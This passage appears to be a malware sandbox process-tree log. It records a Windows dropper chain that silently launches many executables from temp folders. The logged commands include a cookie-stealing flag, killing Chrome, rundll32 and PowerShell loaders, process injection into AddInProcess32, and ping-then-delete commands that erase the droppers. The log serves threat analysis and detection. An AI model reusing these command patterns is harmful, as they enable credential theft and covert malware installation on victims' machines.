C:\Users\Admin\AppData\Local\Temp\homfokrq.3rt\KiffMainE1.exeC:\Users\Admin\AppData\Local\Temp\homfokrq.3rt\KiffMainE1.exe5⤵PID:8912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\trwjdrpz.00v\001.exe & exit4⤵PID:6876
-
C:\Users\Admin\AppData\Local\Temp\trwjdrpz.00v\001.exeC:\Users\Admin\AppData\Local\Temp\trwjdrpz.00v\001.exe5⤵PID:9100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w0p4hddy.l45\installer.exe /qn CAMPAIGN="654" & exit4⤵PID:8280
-
C:\Users\Admin\AppData\Local\Temp\w0p4hddy.l45\installer.exeC:\Users\Admin\AppData\Local\Temp\w0p4hddy.l45\installer.exe /qn CAMPAIGN="654"5⤵PID:8480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x1tgwuof.3to\gpooe.exe & exit4⤵PID:8564
-
C:\Users\Admin\AppData\Local\Temp\x1tgwuof.3to\gpooe.exeC:\Users\Admin\AppData\Local\Temp\x1tgwuof.3to\gpooe.exe5⤵PID:9108
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵PID:9516
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵PID:8632
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oztcwnkm.ydo\sskiper.exe /s & exit4⤵PID:9036
-
C:\Users\Admin\AppData\Local\Temp\oztcwnkm.ydo\sskiper.exeC:\Users\Admin\AppData\Local\Temp\oztcwnkm.ydo\sskiper.exe /s5⤵PID:5472
-
C:\Users\Admin\AppData\Local\Temp\1176909797.exeC:\Users\Admin\AppData\Local\Temp\1176909797.exe6⤵PID:7468
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe7⤵PID:1276
-
-
-
C:\Users\Admin\AppData\Local\Temp\2034376703.exeC:\Users\Admin\AppData\Local\Temp\2034376703.exe6⤵PID:9560
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gupbsy3m.dmy\google-game.exe & exit4⤵PID:7008
-
C:\Users\Admin\AppData\Local\Temp\gupbsy3m.dmy\google-game.exeC:\Users\Admin\AppData\Local\Temp\gupbsy3m.dmy\google-game.exe5⤵PID:9484
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install6⤵PID:9708
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qfgbigx3.z1y\askinstall39.exe & exit4⤵PID:6912
-
C:\Users\Admin\AppData\Local\Temp\qfgbigx3.z1y\askinstall39.exeC:\Users\Admin\AppData\Local\Temp\qfgbigx3.z1y\askinstall39.exe5⤵PID:10024
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:9784
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:4320
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\upinhu0t.rhd\y1.exe & exit4⤵PID:9800
-
C:\Users\Admin\AppData\Local\Temp\upinhu0t.rhd\y1.exeC:\Users\Admin\AppData\Local\Temp\upinhu0t.rhd\y1.exe5⤵PID:9272
-
C:\Users\Admin\AppData\Local\Temp\7iUrGQx8Se.exe"C:\Users\Admin\AppData\Local\Temp\7iUrGQx8Se.exe"6⤵PID:5392
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\7iUrGQx8Se.exe"7⤵PID:6788
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 38⤵
- Runs ping.exe
PID:5100
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\upinhu0t.rhd\y1.exe"6⤵PID:6060
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK7⤵
- Delays execution with timeout.exe
PID:5124
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1cvfej0b.lbc\setup.exe & exit4⤵PID:10008
-
C:\Users\Admin\AppData\Local\Temp\1cvfej0b.lbc\setup.exeC:\Users\Admin\AppData\Local\Temp\1cvfej0b.lbc\setup.exe5⤵PID:10080
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\1cvfej0b.lbc\setup.exe"6⤵PID:9076
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30007⤵
- Runs ping.exe
PID:7724
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0lg0zwer.r1x\toolspab1.exe & exit4⤵PID:10132
-
C:\Users\Admin\AppData\Local\Temp\0lg0zwer.r1x\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\0lg0zwer.r1x\toolspab1.exe5⤵PID:10212
-
C:\Users\Admin\AppData\Local\Temp\0lg0zwer.r1x\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\0lg0zwer.r1x\toolspab1.exe6⤵PID:9896
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vphwh5vx.lpq\GcleanerWW.exe /mixone & exit4⤵PID:9720
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\35de3xo2.tkd\SunLabsPlayer.exe /S & exit4⤵PID:9416
-
C:\Users\Admin\AppData\Local\Temp\35de3xo2.tkd\SunLabsPlayer.exeC:\Users\Admin\AppData\Local\Temp\35de3xo2.tkd\SunLabsPlayer.exe /S5⤵PID:7124
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscA1BC.tmp\tempfile.ps1"6⤵PID:10168
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z10wfifq.ccb\005.exe & exit4⤵PID:1264
-
C:\Users\Admin\AppData\Local\Temp\z10wfifq.ccb\005.exeC:\Users\Admin\AppData\Local\Temp\z10wfifq.ccb\005.exe5⤵PID:9568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ea00kx5h.rwb\Setup3310.exe /Verysilent /subid=623 & exit4⤵PID:6796
-
C:\Users\Admin\AppData\Local\Temp\ea00kx5h.rwb\Setup3310.exeC:\Users\Admin\AppData\Local\Temp\ea00kx5h.rwb\Setup3310.exe /Verysilent /subid=6235⤵PID:9628
-
C:\Users\Admin\AppData\Local\Temp\is-2OO6U.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-2OO6U.tmp\Setup3310.tmp" /SL5="$80712,138429,56832,C:\Users\Admin\AppData\Local\Temp\ea00kx5h.rwb\Setup3310.exe" /Verysilent /subid=6236⤵PID:6932
-
C:\Users\Admin\AppData\Local\Temp\is-JAN3B.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-JAN3B.tmp\Setup.exe" /Verysilent7⤵PID:3816
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\65-e1b4b-ea9-37a85-e18d881d07337\Nehaebefaqe.exe"C:\Users\Admin\AppData\Local\Temp\65-e1b4b-ea9-37a85-e18d881d07337\Nehaebefaqe.exe"3⤵PID:3552
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-I62E3.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-I62E3.tmp\prolab.tmp" /SL5="$205CA,575243,216576,C:\Program Files\Windows Photo Viewer\TKTVDABJQJ\prolab.exe" /VERYSILENT1⤵PID:5836
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9184
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7172